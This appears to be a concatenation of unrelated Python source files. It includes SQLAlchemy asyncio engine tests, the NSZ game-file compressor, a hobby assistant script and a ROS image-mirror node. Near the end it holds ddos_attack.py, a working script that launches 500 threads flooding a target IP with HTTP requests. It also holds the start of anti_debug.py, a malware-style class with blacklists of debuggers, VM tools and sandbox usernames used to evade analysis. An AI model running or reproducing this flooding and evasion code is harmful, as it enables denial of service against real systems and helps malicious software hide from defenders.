event.listen(async_engine, "checkout", mock.Mock())
@async_test
async def test_sync_before_cursor_execute_engine(self, async_engine):
canary = mock.Mock()
event.listen(async_engine.sync_engine, "before_cursor_execute", canary)
async with async_engine.connect() as conn:
sync_conn = conn.sync_connection
await conn.execute(text("select 1"))
eq_(
canary.mock_calls,
[
mock.call(
sync_conn, mock.ANY, "select 1", mock.ANY, mock.ANY, False
)
],
)
@async_test
async def test_sync_before_cursor_execute_connection(self, async_engine):
canary = mock.Mock()
async with async_engine.connect() as conn:
sync_conn = conn.sync_connection
event.listen(
async_engine.sync_engine, "before_cursor_execute", canary
)
await conn.execute(text("select 1"))
eq_(
canary.mock_calls,
[
mock.call(
sync_conn, mock.ANY, "select 1", mock.ANY, mock.ANY, False
)
],
)
@async_test
async def test_event_on_sync_connection(self, async_engine):
canary = mock.Mock()
async with async_engine.connect() as conn:
event.listen(conn.sync_connection, "begin", canary)
async with conn.begin():
eq_(
canary.mock_calls,
[mock.call(conn.sync_connection)],
)
class AsyncInspection(EngineFixture):
__backend__ = True
@async_test
async def test_inspect_engine(self, async_engine):
with testing.expect_raises_message(
exc.NoInspectionAvailable,
"Inspection on an AsyncEngine is currently not supported.",
):
inspect(async_engine)
@async_test
async def test_inspect_connection(self, async_engine):
async with async_engine.connect() as conn:
with testing.expect_raises_message(
exc.NoInspectionAvailable,
"Inspection on an AsyncConnection is currently not supported.",
):
inspect(conn)
class AsyncResultTest(EngineFixture):
@async_test
async def test_no_ss_cursor_w_execute(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
conn = await conn.execution_options(stream_results=True)
with expect_raises_message(
async_exc.AsyncMethodRequired,
r"Can't use the AsyncConnection.execute\(\) method with a "
r"server-side cursor. Use the AsyncConnection.stream\(\) "
r"method for an async streaming result set.",
):
await conn.execute(select(users))
@async_test
async def test_no_ss_cursor_w_exec_driver_sql(self, async_engine):
async with async_engine.connect() as conn:
conn = await conn.execution_options(stream_results=True)
with expect_raises_message(
async_exc.AsyncMethodRequired,
r"Can't use the AsyncConnection.exec_driver_sql\(\) "
r"method with a "
r"server-side cursor. Use the AsyncConnection.stream\(\) "
r"method for an async streaming result set.",
):
await conn.exec_driver_sql("SELECT * FROM users")
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_all(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
all_ = await result.all()
if filter_ == "mappings":
eq_(
all_,
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(1, 20)
],
)
elif filter_ == "scalars":
eq_(
all_,
["name%d" % i for i in range(1, 20)],
)
else:
eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_aiter(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
rows = []
async for row in result:
rows.append(row)
if filter_ == "mappings":
eq_(
rows,
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(1, 20)
],
)
elif filter_ == "scalars":
eq_(
rows,
["name%d" % i for i in range(1, 20)],
)
else:
eq_(rows, [(i, "name%d" % i) for i in range(1, 20)])
@testing.combinations((None,), ("mappings",), argnames="filter_")
@async_test
async def test_keys(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
eq_(result.keys(), ["user_id", "user_name"])
await result.close()
@async_test
async def test_unique_all(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
union_all(select(users), select(users)).order_by(
users.c.user_id
)
)
all_ = await result.unique().all()
eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])
@async_test
async def test_columns_all(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
all_ = await result.columns(1).all()
eq_(all_, [("name%d" % i,) for i in range(1, 20)])
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_partitions(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
check_result = []
async for partition in result.partitions(5):
check_result.append(partition)
if filter_ == "mappings":
eq_(
check_result,
[
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(a, b)
]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
elif filter_ == "scalars":
eq_(
check_result,
[
["name%d" % i for i in range(a, b)]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
else:
eq_(
check_result,
[
[(i, "name%d" % i) for i in range(a, b)]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_one_success(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).limit(1).order_by(users.c.user_name)
)
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars()
u1 = await result.one()
if filter_ == "mappings":
eq_(u1, {"user_id": 1, "user_name": "name%d" % 1})
elif filter_ == "scalars":
eq_(u1, 1)
else:
eq_(u1, (1, "name%d" % 1))
@async_test
async def test_one_no_result(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).where(users.c.user_name == "nonexistent")
)
with expect_raises_message(
exc.NoResultFound, "No row was found when one was required"
):
await result.one()
@async_test
async def test_one_multi_result(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).where(users.c.user_name.in_(["name3", "name5"]))
)
with expect_raises_message(
exc.MultipleResultsFound,
"Multiple rows were found when exactly one was required",
):
await result.one()
@testing.combinations(
("scalars",), ("stream_scalars",), argnames="filter_"
)
@async_test
async def test_scalars(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
if filter_ == "scalars":
result = (await conn.scalars(select(users))).all()
elif filter_ == "stream_scalars":
result = await (await conn.stream_scalars(select(users))).all()
eq_(result, list(range(1, 20)))
class TextSyncDBAPI(fixtures.TestBase):
__requires__ = ("asyncio",)
def test_sync_dbapi_raises(self):
with expect_raises_message(
exc.InvalidRequestError,
"The asyncio extension requires an async driver to be used.",
):
create_async_engine("sqlite:///:memory:")
@testing.fixture
def async_engine(self):
engine = create_engine("sqlite:///:memory:", future=True)
engine.dialect.is_async = True
return _async_engine.AsyncEngine(engine)
@async_test
@combinations(
lambda conn: conn.exec_driver_sql("select 1"),
lambda conn: conn.stream(text("select 1")),
lambda conn: conn.execute(text("select 1")),
argnames="case",
)
async def test_sync_driver_execution(self, async_engine, case):
with expect_raises_message(
exc.AwaitRequired,
"The current operation required an async execution but none was",
):
async with async_engine.connect() as conn:
await case(conn)
@async_test
async def test_sync_driver_run_sync(self, async_engine):
async with async_engine.connect() as conn:
res = await conn.run_sync(
lambda conn: conn.scalar(text("select 1"))
)
assert res == 1
assert await conn.run_sync(lambda _: 2) == 2
class AsyncProxyTest(EngineFixture, fixtures.TestBase):
@async_test
async def test_get_transaction(self, async_engine):
async with async_engine.connect() as conn:
async with conn.begin() as trans:
is_(trans.connection, conn)
is_(conn.get_transaction(), trans)
@async_test
async def test_get_nested_transaction(self, async_engine):
async with async_engine.connect() as conn:
async with conn.begin() as trans:
n1 = await conn.begin_nested()
is_(conn.get_nested_transaction(), n1)
n2 = await conn.begin_nested()
is_(conn.get_nested_transaction(), n2)
await n2.commit()
is_(conn.get_nested_transaction(), n1)
is_(conn.get_transaction(), trans)
@async_test
async def test_get_connection(self, async_engine):
async with async_engine.connect() as conn:
is_(
AsyncConnection._retrieve_proxy_for_target(
conn.sync_connection
),
conn,
)
def test_regenerate_connection(self, connection):
async_connection = AsyncConnection._retrieve_proxy_for_target(
connection
)
a2 = AsyncConnection._retrieve_proxy_for_target(connection)
is_(async_connection, a2)
is_not(async_connection, None)
is_(async_connection.engine, a2.engine)
is_not(async_connection.engine, None)
@testing.requires.predictable_gc
@async_test
async def test_gc_engine(self, testing_engine):
ReversibleProxy._proxy_objects.clear()
eq_(len(ReversibleProxy._proxy_objects), 0)
async_engine = AsyncEngine(testing.db)
eq_(len(ReversibleProxy._proxy_objects), 1)
del async_engine
eq_(len(ReversibleProxy._proxy_objects), 0)
@testing.requires.predictable_gc
@async_test
async def test_gc_conn(self, testing_engine):
ReversibleProxy._proxy_objects.clear()
async_engine = AsyncEngine(testing.db)
eq_(len(ReversibleProxy._proxy_objects), 1)
async with async_engine.connect() as conn:
eq_(len(ReversibleProxy._proxy_objects), 2)
async with conn.begin() as trans:
eq_(len(ReversibleProxy._proxy_objects), 3)
del trans
del conn
eq_(len(ReversibleProxy._proxy_objects), 1)
del async_engine
eq_(len(ReversibleProxy._proxy_objects), 0)
def test_regen_conn_but_not_engine(self, async_engine):
with async_engine.sync_engine.connect() as sync_conn:
async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
async_conn2 = AsyncConnection._retrieve_proxy_for_target(sync_conn)
is_(async_conn, async_conn2)
is_(async_conn.engine, async_engine)
def test_regen_trans_but_not_conn(self, connection_no_trans):
sync_conn = connection_no_trans
async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
trans = sync_conn.begin()
async_t1 = async_conn.get_transaction()
is_(async_t1.connection, async_conn)
is_(async_t1.sync_transaction, trans)
async_t2 = async_conn.get_transaction()
is_(async_t1, async_t2)
|
__init__.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from sys import path
from pathlib import Path
from sys import argv
from nsz.nut import Print
from os import listdir, _exit, remove
from time import sleep
from nsz.Fs import Nsp, Hfs0, factory
from nsz.BlockCompressor import blockCompress
from nsz.SolidCompressor import solidCompress
from traceback import print_exc, format_exc
from nsz.NszDecompressor import verify as NszVerify, decompress as NszDecompress, VerificationException
from multiprocessing import cpu_count, freeze_support, Process, Manager
from nsz.ThreadSafeCounter import Counter
from nsz.FileExistingChecks import CreateTargetDict, AllowedToWriteOutfile, delete_source_file
from nsz.ParseArguments import *
from nsz.PathTools import *
from nsz.ExtractTitlekeys import *
from nsz.undupe import undupe
import enlighten
import time
import sys
def solidCompressTask(in_queue, statusReport, readyForWork, pleaseNoPrint, pleaseKillYourself, id):
while True:
readyForWork.increment()
item = in_queue.get()
readyForWork.decrement()
if pleaseKillYourself.value() > 0:
break
try:
filePath, compressionLevel, outputDir, threadsToUse, verifyArg = item
outFile = solidCompress(filePath, compressionLevel, outputDir, threadsToUse, statusReport, id, pleaseNoPrint)
if verifyArg:
Print.info("[VERIFY NSZ] {0}".format(outFile))
try:
verify(outFile, True, [statusReport, id], pleaseNoPrint)
except VerificationException:
Print.error("[BAD VERIFY] {0}".format(outFile))
Print.error("[DELETE NSZ] {0}".format(outFile))
remove(outFile)
except KeyboardInterrupt:
Print.info('Keyboard exception')
except BaseException as e:
Print.info('nut exception: {0}'.format(str(e)))
raise
def compress(filePath, outputDir, args, work, amountOfTastkQueued):
compressionLevel = 18 if args.level is None else args.level
if filePath.suffix == ".xci" and not args.solid or args.block:
threadsToUseForBlockCompression = args.threads if args.threads > 0 else cpu_count()
outFile = blockCompress(filePath, compressionLevel, args.bs, outputDir, threadsToUseForBlockCompression)
if args.verify:
Print.info("[VERIFY NSZ] {0}".format(outFile))
verify(outFile, True)
else:
threadsToUseForSolidCompression = args.threads if args.threads > 0 else 3
work.put([filePath, compressionLevel, outputDir, threadsToUseForSolidCompression, args.verify])
amountOfTastkQueued.increment()
def decompress(filePath, outputDir, statusReportInfo = None):
NszDecompress(filePath, outputDir, statusReportInfo)
def verify(filePath, raiseVerificationException, statusReportInfo = None, pleaseNoPrint = None):
NszVerify(filePath, raiseVerificationException, statusReportInfo, pleaseNoPrint)
err = []
def main():
global err
try:
if len(argv) > 1:
args = ParseArguments.parse()
else:
try:
from nsz.gui.NSZ_GUI import GUI
except ImportError:
Print.error("Failed to import the GUI - is it installed?")
return
args = GUI().run()
if args == None:
Print.info("Done!")
return
if args.output:
argOutFolderToPharse = args.output
if not argOutFolderToPharse.endswith('/') and not argOutFolderToPharse.endswith('\\'):
argOutFolderToPharse += "/"
if not Path(argOutFolderToPharse).is_dir():
Print.error('Error: Output directory "{0}" does not exist!'.format(args.output))
return
argOutFolder = Path(argOutFolderToPharse).resolve() if args.output else None
Print.info('')
Print.info(' NSZ v4.0 ,;:;;,')
Print.info(' ;;;;;')
Print.info(' .=\', ;:;;:,')
Print.info(' /_\', "=. \';:;:;')
Print.info(' @=:__, \,;:;:\'')
Print.info(' _(\.= ;:;;\'')
Print.info(' `"_( _/="`')
Print.info(' `"\'')
Print.info('')
barManager = enlighten.get_manager()
poolManager = Manager()
statusReport = poolManager.list()
readyForWork = Counter(0)
pleaseNoPrint = Counter(0)
pleaseKillYourself = Counter(0)
pool = []
work = poolManager.Queue()
amountOfTastkQueued = Counter(0)
targetDictNsz = dict()
targetDictXcz = dict()
if args.titlekeys:
extractTitlekeys(args.file)
if args.extract:
for f_str in args.file:
for filePath in expandFiles(Path(f_str)):
filePath_str = str(filePath)
outFolder = argOutFolder.joinpath(filePath.stem) if argOutFolder else filePath.parent.absolute().joinpath(filePath.stem)
Print.info('Extracting "{0}" to {1}'.format(filePath_str, outFolder))
container = factory(filePath)
container.open(filePath_str, 'rb')
if isXciXcz(filePath):
for hfs0 in container.hfs0:
secureIn = hfs0
secureIn.unpack(outFolder.joinpath(hfs0._path), args.extractregex)
else:
container.unpack(outFolder, args.extractregex)
container.close()
if args.undupe or args.undupe_dryrun:
undupe(args, argOutFolder);
if args.create:
Print.info('Creating "{0}"'.format(args.create))
nsp = Nsp.Nsp(None, None)
nsp.path = args.create
nsp.pack(args.file)
if args.C:
sourceFileToDelete = []
for f_str in args.file:
for filePath in expandFiles(Path(f_str)):
if not isUncompressedGame(filePath):
continue
try:
outFolder = argOutFolder if argOutFolder else filePath.parent.absolute()
if filePath.suffix == '.nsp':
if not outFolder in targetDictNsz:
targetDictNsz[outFolder] = CreateTargetDict(outFolder, args, ".nsz")
if not AllowedToWriteOutfile(filePath, ".nsz", targetDictNsz[outFolder], args):
continue
elif filePath.suffix == '.xci':
if not outFolder in targetDictXcz:
targetDictXcz[outFolder] = CreateTargetDict(outFolder, args, ".xcz")
if not AllowedToWriteOutfile(filePath, ".xcz", targetDictXcz[outFolder], args):
continue
compress(filePath, outFolder, args, work, amountOfTastkQueued)
if args.rm_source:
sourceFileToDelete.append(filePath)
except KeyboardInterrupt:
raise
except BaseException as e:
Print.error('Error while compressing file: %s' % filePath)
err.append({"filename":filePath,"error":format_exc() })
print_exc()
bars = []
compressedSubBars = []
BAR_FMT = u'{desc}{desc_pad}{percentage:3.0f}%|{bar}| {count:{len_total}d}/{total:d} {unit} [{elapsed}<{eta}, {rate:.2f}{unit_pad}{unit}/s]'
parallelTasks = min(args.multi, amountOfTastkQueued.value())
if parallelTasks < 0:
parallelTasks = 4
for i in range(parallelTasks):
statusReport.append([0, 0, 100, 'Compressing'])
p = Process(target=solidCompressTask, args=(work, statusReport, readyForWork, pleaseNoPrint, pleaseKillYourself, i))
p.start()
pool.append(p)
for i in range(parallelTasks):
bar = barManager.counter(total=100, desc='Compressing', unit='MiB', color='cyan', bar_format=BAR_FMT)
compressedSubBars.append(bar.add_subcounter('green'))
bars.append(bar)
#Ensures that all threads are started and compleaded before being requested to quit
while readyForWork.value() < parallelTasks:
sleep(0.2)
if pleaseNoPrint.value() > 0:
continue
pleaseNoPrint.increment()
for i in range(parallelTasks):
compressedRead, compressedWritten, total, currentStep = statusReport[i]
if bars[i].total != total:
bars[i].total = total//1048576
bars[i].count = compressedRead//1048576
compressedSubBars[i].count = compressedWritten//1048576
bars[i].desc = currentStep
bars[i].refresh()
pleaseNoPrint.decrement()
pleaseKillYourself.increment()
for i in range(readyForWork.value()):
work.put(None)
while readyForWork.value() > 0:
sleep(0.02)
for i in range(parallelTasks):
bars[i].close(clear=True)
barManager.stop()
for filePath in sourceFileToDelete:
delete_source_file(filePath)
if args.D:
for f_str in args.file:
for filePath in expandFiles(Path(f_str)):
if not isCompressedGame(filePath) and not isCompressedGameFile(filePath):
continue
try:
outFolder = argOutFolder if argOutFolder else filePath.parent.absolute()
if filePath.suffix == '.nsz':
if not outFolder in targetDictNsz:
targetDictNsz[outFolder] = CreateTargetDict(outFolder, args, ".xcz")
if not AllowedToWriteOutfile(filePath, ".nsp", targetDictNsz[outFolder], args):
continue
elif filePath.suffix == '.xcz':
if not outFolder in targetDictXcz:
targetDictXcz[outFolder] = CreateTargetDict(outFolder, args, ".xcz")
if not AllowedToWriteOutfile(filePath, ".xci", targetDictXcz[outFolder], args):
continue
elif filePath.suffix == '.ncz':
outFile = Path(changeExtension(outFolder.joinpath(filePath.name), ".nca"))
if not args.overwrite and outFile.is_file():
Print.info('{0} with the same file name already exists in the output directory.\n'\
'If you want to overwrite it use the -w parameter!'.format(outFile.name))
continue
decompress(filePath, outFolder)
if args.rm_source:
delete_source_file(filePath)
except KeyboardInterrupt:
raise
except BaseException as e:
Print.error('Error while decompressing file: {0}'.format(filePath))
err.append({"filename":filePath, "error":format_exc()})
print_exc()
if args.info:
for f_str in args.file:
for filePath in expandFiles(Path(f_str)):
filePath_str = str(filePath)
Print.info(filePath_str)
f = factory(filePath)
f.open(filePath_str, 'r+b')
f.printInfo(args.depth+1)
f.close()
if args.verify and not args.C and not args.D:
for f_str in args.file:
for filePath in expandFiles(Path(f_str)):
try:
if isGame(filePath):
Print.info("[VERIFY {0}] {1}".format(getExtensionName(filePath), filePath.name))
verify(filePath, True)
except KeyboardInterrupt:
raise
except BaseException as e:
Print.error('Error while verifying file: {0}'.format(filePath))
err.append({"filename":filePath,"error":format_exc()})
print_exc()
if len(argv) == 1:
pass
except KeyboardInterrupt:
Print.info('Keyboard exception')
except BaseException as e:
Print.info('nut exception: {0}'.format(str(e)))
raise
if err:
Print.info('\n\033[93m\033[1mSummary of errors which occurred while processing files:')
for e in err:
Print.info('\033[0mError while processing {0}'.format(e["filename"]))
Print.info(e["error"])
Print.info('\nDone!\n')
print()
print()
if len(argv) <= 1:
input("Press Enter to exit...")
sys.exit(1)
Print.info('\nDone!\n')
if len(argv) <= 1:
input("Press Enter to exit...")
sys.exit(0)
#breakpoint()
if __name__ == '__main__':
freeze_support()
main()
|
test_mvar.py
|
# Copyright (c) 2018 Gabriele Baldoni.
#
# See the NOTICE file(s) distributed with this work for additional
# information regarding copyright ownership.
#
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License 2.0 which is available at
# http://www.eclipse.org/legal/epl-2.0, or the Apache License, Version 2.0
# which is available at https://www.apache.org/licenses/LICENSE-2.0.
#
# SPDX-License-Identifier: Apache-2.0
#
# Contributors: Gabriele Baldoni MVar implementation in Python
import unittest
from mvar import MVar
from threading import Thread
from random import randint
import time
class MVarTests(unittest.TestCase):
def test_get_put(self):
def worker(var):
time.sleep(randint(1, 3))
var.put(1)
def worker2(var):
var.put(3)
local_var = MVar()
Thread(target=worker, args=(local_var,), daemon=True).start()
res = local_var.take()
local_var.put(2)
Thread(target=worker2, args=(local_var,), daemon=True).start()
res2 = local_var.take()
res3 = local_var.take()
self.assertEqual(res, 1)
self.assertEqual(res2, 2)
self.assertEqual(res3, 3)
|
project.py
|
import datetime
import time
import wikipedia
import webbrowser
from multiprocessing import Process
class userinput():
def time(self):
hour = int(datetime.datetime.now().hour)
if hour >= 0 and hour < 12:
print("Good Morning Sir")
elif hour >= 12 and hour<18:
print("Good Afternoon Sir")
else:
print("Good Evening Sir")
def r_write(self, text, file_name):
reminder_file = open(file_name , "w")
reminder_content = reminder_file.write(text)
print("\nYour file is Written into ",file_name)
def r_read(self, file_name):
reminder_file = open(file_name, "r")
reminder_content = reminder_file.read()
reminder_file.close()
reminder = reminder_content
return reminder
def r_append(self, extra, file_name):
reminder_file = open(file_name, "a")
file = reminder_file.write(extra)
reminder_file.close()
print("Append complete")
def reminder(self, file_name, remember, timer):
reminder = self.r_write(remember, file_name)
timer = timer * 60 #Doing this because python sleep function only works in seconds so need to convert to mintues
print("Reminder started")
time.sleep(timer)
print(self.r_read(file_name))
print("Reminder alert!...check reminder Sir")
def chat_main(self):
while True:
query_of_user = input("Please enter what you'd like me to do?")
query_of_user.lower()
if 'wikipedia' in query_of_user:
ask_user = input("Sir I have two options..would you like to search or open the website? Open/search")
if ask_user.lower() == "open wikipedia":
operator = webbrowser.get()
operator.open("https://en.wikipedia.org/wiki/Main_Page")
elif ask_user.lower() == "search":
results = input("What would you like to search?")
print("Searching Wikipedia...")
results = wikipedia.search(results)
query_of_user = query_of_user.replace("","")
print("According to Wikipedia")
print(results)
elif 'open youtube' in query_of_user:
operator = webbrowser.get()
operator.open("https://www.youtube.com")
elif 'open google' in query_of_user:
operator = webbrowser.get()
operator.open("https://www.google.com")
elif 'open stackoverflow' in query_of_user:
operator = webbrowser.get()
operator.open("https://www.stackoverflow.com")
elif "the time" in query_of_user:
thetime = datetime.datetime.now()
print("Sir the time is currently...{}".format(thetime))
elif 'reminder' in query_of_user:
new_ask_user = input("Would you like to be reminded of someting? Y/N")
if new_ask_user.lower() == "y":
file_name = input("What do you want to be reminded and the filename?")
remember = input("What would you like to be reminded about Sir?")
timer = float(input("In how many mintues should I remind you Sir?"))
remind_process = Process(target=self.reminder, args=(file_name, remember, timer))
remind_process.start()
print("Reminder process Started")
time.sleep(0.3)
ask_user = input("Would you like to Read/Write/Append the file Sir? Read/Write/Append")
if ask_user.lower() == "read":
file_name = str(input("What should the File name be?"))
remind = self.r_read(file_name)
print(remind)
elif ask_user.lower() == "append":
extra = str(input("What do you want to add?"))
file_name = str(input("What should the File name be?"))
self.r_append(extra, file_name)
elif ask_user.lower() == "write":
text = str(input("What do you want to be reminded of?"))
file_name = str(input("What should the File name be?"))
self.r_write(text,file_name)
else:
continue
elif 'notepad' in query_of_user:
notesobj = open("notepad.txt" , "w")
print("Please enter if you'd like to write in the file")
notesobj.write(input())
notesobj.close()
print("Success")
ask_user = input("Would you like to read/write to that file Sir? Read/append")
if ask_user.lower() == "read":
notesobj = open("notepad.txt", "r")
print(notesobj.read())
elif ask_user.lower() == "append":
notesobj = open("notepad.txt", "a")
notesobj = open("notepad.txt", "a")
print("please write what you'd like to say sir")
notesobj.write(input())
notesobj.close()
ask_user = input("Would you like to create another file sir? Y/N")
if ask_user.lower() == "y":
notesobj = opepn("notepad1.txt" , "w")
print("What would you like to write sir?")
notesobj.write(input())
notesobj.close()
print("Success")
ask_user = input("Would like to read/append that file sir? Read/Append")
if ask_user.lower() == "read":
notesobj = open("notepad1.txt", "r")
elif ask_user.lower() == "append":
print("please write what you'd like to say sir")
notesobj = open("notepad1.txt", "a")
notesobj.write(input())
notesobj.close()
elif ask_user.lower() == "n":
continue
elif 'open spotify' in query_of_user:
operator = webbrowser.get()
operator.open("https://www.spotify.com/uk/")
elif 'exit' in query_of_user:
print("Sure no problem Sir, goodbye")
break
else:
print("Sorry please try again Sir.")
if __name__ == "__main__":
print("""
Please choose from the following options Sir:
-----Wikipedia
----Notepad
----reminders
----Spotify
----the time
----the stackoverflow
----google
----youtube
----exit
"""
)
thread_one = userinput()
thread_one.chat_main()
|
testing.py
|
import os, sys
import argparse
MY_PATH = os.path.dirname(os.path.abspath(__file__))
if __name__ == '__main__':
# path = os.path.join(train.DEFAULT_DATA_PATH, 'emnist')
# torchvision.datasets.EMNIST(path, split='letters', download=True, train=True)
# mp.freeze_support()
# mp.set_start_method('spawn')
# a = torch.arange(3)#.cuda()
# p = mp.Process(target=t, args=(a,1,))
# p.start()
# p.join()
print(sys.argv)
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('test', type=str)
parser.add_argument('--test2', type=str)
args = parser.parse_known_args()
print(args)
# train.register_config('mnist', os.path.join(MY_PATH, 'mnist', 'config', 'base.toml'))
#
# print(train.config._config_registry)
# C = train.get_config('mnist')
# print(C.keys())
|
virtual_mirror_tristan_node.py
|
#!/usr/bin/env python
import rospy
import cv2
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs.msg import CompressedImage, Image
from duckietown_msgs_tristan.msg import FlipDirection
import numpy as np
import threading
class VirtualMirrorNode(object):
def __init__(self):
self.node_name = "Virtual Mirror"
self.flip_direction = self.setupParam("~flip_direction","vert")
self.param_timer = rospy.Timer(rospy.Duration.from_sec(1.0),self.cbParamTimer)
# Thread lock
self.thread_lock = threading.Lock()
self.bridge = CvBridge()
# Publishers
self.pub_image = rospy.Publisher("~mirror_image", Image, queue_size=1)
self.pub_flip_direction = rospy.Publisher("~flip_direction", FlipDirection, queue_size=1)
# Verbose option
#self.verbose = rospy.get_param('~verbose')
self.verbose = False
#if self.verbose:
# self.toc_pre = rospy.get_time()
# Subscribers
self.sub_image = rospy.Subscriber("~image", CompressedImage, self.cbImage, queue_size=1)
rospy.loginfo("[%s] Initialized." %(self.node_name))
def cbParamTimer(self,event):
self.flip_direction = rospy.get_param("~flip_direction", "vert")
flip_out = FlipDirection()
flip_out.flip_direction = self.flip_direction
self.pub_flip_direction.publish(flip_out)
def setupParam(self,param_name,default_value):
value = rospy.get_param(param_name,default_value)
rospy.set_param(param_name,value) #Write to parameter server for transparancy
rospy.loginfo("[%s] %s = %s " %(self.node_name,param_name,value))
return value
def cbImage(self,image_msg):
# Start a daemon thread to process the image
thread = threading.Thread(target=self.processImage,args=(image_msg,))
thread.setDaemon(True)
thread.start()
# Returns rightaway
def processImage(self,image_msg):
if not self.thread_lock.acquire(False):
# Return immediately if the thread is locked
return
# Verbose
if self.verbose:
rospy.loginfo("[%s] Latency received = %.3f ms" %(self.node_name, (rospy.get_time()-image_msg.header.stamp.to_sec()) * 1000.0))
# Decode from compressed image
# with OpenCV
image_cv = cv2.imdecode(np.fromstring(image_msg.data, np.uint8), cv2.CV_LOAD_IMAGE_COLOR)
# Verbose
if self.verbose:
self.tic = rospy.get_time()
rospy.loginfo("[%s] Latency image decompressed = %.3f ms" %(self.node_name, (self.tic-image_msg.header.stamp.to_sec()) * 1000.0))
# Process image here
if self.flip_direction == "horz":
mirrorImage = image_cv[:,::-1,:]
else:
mirrorImage = image_cv[::-1,:,:]
# Publish the frame with lines
image_msg_out = self.bridge.cv2_to_imgmsg(mirrorImage, "bgr8")
image_msg_out.header.stamp = image_msg.header.stamp
self.pub_image.publish(image_msg_out)
# Verbose
if self.verbose:
rospy.loginfo("[%s] Latency sent = %.3f ms" %(self.node_name, (rospy.get_time()-image_msg.header.stamp.to_sec()) * 1000.0))
# Release the thread lock
self.thread_lock.release()
def onShutdown(self):
rospy.loginfo("[VirtualMirrorNode] Shutdown.")
if __name__ == '__main__':
rospy.init_node('virtual_mirror_tristan_node',anonymous=False)
virtual_mirror_node = VirtualMirrorNode()
rospy.on_shutdown(virtual_mirror_node.onShutdown)
rospy.spin()
|
ddos_attack.py
|
"""
ddos_attack.py
- This script is used to demo a distributed denial of service attack
- Pytest along with several other copies of this script can be used to achieve a larger load
> pytest -n 10 # 10 being the number of scripts/workers
"""
import socket
import threading
# IP address of the target
target = "192.168.1.1"
print(f"Target: {target}")
# port for python to use
port = 80
print(f"Port: {port}")
# mask ip of python
mask_ip = "10.10.10.2"
print(f"Mask: {mask_ip}")
# connected counter
connected = 0
def ddos():
# recursive loop
while True:
# init server
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect server
serv.connect((target, port))
# send request
serv.sendto(
("GET /" + target + " HTTP/1.1\r\n").encode("ascii"), (target, port)
)
serv.sendto(("Host: " + mask_ip + "\r\n\r\n").encode("ascii"), (target, port))
# close server
serv.close()
# use global
global connected
# rollback count
connected += 1
# log request
print(f"DDOS Attempt: #{connected} -->> Target: {target}:{port}")
# run 500 times
for i in range(500):
# start thread on ddos()
thread = threading.Thread(target=ddos)
thread.start()
|
anti_debug.py
|
import os
import sys
import time
import httpx
import winreg
import psutil
import threading
import subprocess
class AntiDebug:
inVM = False
def __init__(self):
self.running = True
self.processes = list()
self.blackListedPrograms = ["httpdebuggerui.exe","wireshark.exe","fiddler.exe","regedit.exe","cmd.exe","taskmgr.exe","vboxservice.exe","df5serv.exe","processhacker.exe","vboxtray.exe","vmtoolsd.exe","vmwaretray.exe","ida64.exe","ollydbg.exe","pestudio.exe","vmwareuser","vgauthservice.exe","vmacthlp.exe","x96dbg.exe","vmsrvc.exe","x32dbg.exe","vmusrvc.exe","prl_cc.exe","prl_tools.exe","xenservice.exe","qemu-ga.exe","joeboxcontrol.exe","ksdumperclient.exe","ksdumper.exe","joeboxserver.exe"]
self.blackListedUsers = ["WDAGUtilityAccount","Abby","Peter Wilson","hmarc","patex","JOHN-PC","RDhJ0CNFevzX","kEecfMwgj","Frank","8Nl0ColNQ5bq","Lisa","John","george","PxmdUOpVyx","8VizSM","w0fjuOVmCcP5A","lmVwjj9b","PqONjHVwexsS","3u2v9m8","Julia","HEUeRzl",]
